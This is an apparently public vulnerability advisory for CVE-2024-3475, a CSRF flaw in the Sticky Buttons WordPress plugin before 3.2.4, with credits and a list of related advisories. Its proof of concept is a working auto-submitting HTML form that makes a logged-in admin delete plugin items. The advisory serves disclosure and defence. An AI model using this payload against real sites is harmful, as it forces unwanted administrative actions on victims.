WordPress Plugin Vulnerabilities

Sticky Buttons < 3.2.4 - Button Deletion via CSRF

Description

The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML file where `ID` is a valid ID:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=sticky-buttons" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

Plugin icon
sticky-buttons
Fixed in 3.2.4

References

CVE
CVE-2024-3475

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
bf540242-5306-4c94-ad50-782d0d5b127f

Timeline

Publicly Published
2024-04-11 (about 1 months ago)
Added
2024-04-11 (about 1 months ago)
Last Updated
2024-04-11 (about 1 months ago)

Other

Published
Title
Published
2024-04-05
Title
WooCommerce Checkout Field Editor (Checkout Manager) < 2.1.9 - Cross-Site Request Forgery
Published
2023-11-07
Title
Best Restaurant Menu by PriceListo < 1.4.0 - Settings Update via CSRF
Published
2023-02-16
Title
Schema - All In One Schema Rich Snippets < 1.6.6 - Multiple CSRF
Published
2020-09-16
Title
Dokan < 3.0.9 - Cross-Site Request Forgery
Published
2023-02-28
Title
Ever Compare < 1.2.4 - Arbitrary Plugin Activation via CSRF